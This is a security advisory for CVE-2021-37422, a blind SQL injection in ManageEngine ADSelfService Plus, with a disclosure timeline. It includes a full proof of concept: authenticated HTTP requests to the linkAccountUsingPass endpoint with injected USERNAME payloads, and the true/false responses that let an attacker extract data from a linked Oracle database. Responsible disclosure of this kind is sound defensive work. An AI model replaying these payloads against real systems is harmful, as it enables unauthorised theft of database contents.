
CVE ID: CVE-2021-37422

Title: SQL Injection in linked Oracle Database

CVSS score: 7.7 (High)

CVSS vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N

Product: ManageEngine ADSelfService Plus

Affected versions: < 6112

Credits: Krzysztof Andrusiak and Marcin Ogorzelski

The username provided when linking an account with an external Oracle Database is inserted into a SQL query without sanitization. The resulting query is sent to the linked Oracle Database, which allows a Boolean-based blind SQL injection attack (and therefore exfiltration of information stored in that database). Any authenticated domain user of ADSelfService Plus can trigger it, which is why the vector carries PR:L with changed scope (the data exposed belongs to the linked Oracle Database, not to ADSelfService Plus itself).

  1. Install Oracle Database and add it to Configured Applications in ADSSP (with Password Sync enabled).
  2. Log in to ADSSP as any domain user, then copy user's JSESSIONIDADSSP and JSESSIONIDADSSPSSO cookie values from the browser.
  3. Send the following request to the server (replacing COOKIE_VALUE with valid cookies from previous step):
GET /ServletAPI/selfService/IAMApps/getIAMApps HTTP/1.1
Host: alpha-manage:8888
Cookie: JSESSIONIDADSSP=COOKIE_VALUE; JSESSIONIDADSSPSSO=COOKIE_VALUE; adscsrf=ff84ae2e-267f-4f17-bd7a-094c4b4c5bbc
  4. Copy the APP_ID, HOST_NAME and APP_CONFIG_ID values from the response body (from the JSON entry for the Oracle Database application).
  5. Send the following request to the server (replacing COOKIE_VALUE with the valid cookies from step 2, and HOST_NAME, APP_CONFIG_ID and APP_ID with the values retrieved in step 4). The adscsrf token appears both as a cookie and as a body parameter and must be the same in both places, and Content-Length must match the body you actually send. The injected condition here is always false (1=0):
POST /ServletAPI/selfService/IAMApps/linkAccountUsingPass HTTP/1.1
Host: alpha-manage:8888
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: JSESSIONIDADSSP=COOKIE_VALUE; JSESSIONIDADSSPSSO=COOKIE_VALUE; adscsrf=2f482a1d-764f-484b-81be-fa5f9f527002
Content-Length: 134

adscsrf=2f482a1d-764f-484b-81be-fa5f9f527002&HOST_NAME=192.168.100.100&APP_CONFIG_ID=301&APP_ID=5&PASSWORD=x&USERNAME=test'%20OR%201=0%20--%20

Response body:

{"eSTATUS":"idm.nonad.pwdsync.oracle_db.user_not_found"}
  6. Send the same request again, replacing COOKIE_VALUE, HOST_NAME, APP_CONFIG_ID and APP_ID as in step 5. The only difference is the injected condition, which is now always true (1=1):
POST /ServletAPI/selfService/IAMApps/linkAccountUsingPass HTTP/1.1
Host: alpha-manage:8888
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: JSESSIONIDADSSP=COOKIE_VALUE; JSESSIONIDADSSPSSO=COOKIE_VALUE; adscsrf=2f482a1d-764f-484b-81be-fa5f9f527002
Content-Length: 134

adscsrf=2f482a1d-764f-484b-81be-fa5f9f527002&HOST_NAME=192.168.100.100&APP_CONFIG_ID=301&APP_ID=5&PASSWORD=x&USERNAME=test'%20OR%201=1%20--%20

Response body:

{"eSTATUS":"idm.nonad.pwdsync.oracle_db.invalid_password"}

As can be seen, the server returns user_not_found when the injected condition is false (no row matches the username) and invalid_password when it is true (a row matches and the password check then fails). Because these two outcomes are distinguishable, any SQL condition can be evaluated through this endpoint, which makes it possible to exfiltrate database data via a Boolean-based blind SQL injection attack.

  • 17-03-2021 - Vulnerability reported to vendor
  • 18-03-2021 - First response from vendor
  • 26-05-2021 - Additional questions received from vendor
  • 28-05-2021 - Response sent to vendor
  • 26-08-2021 - Fixed version release
  • 04-10-2023 - Public disclosure
  • 04-10-2023 - PoC release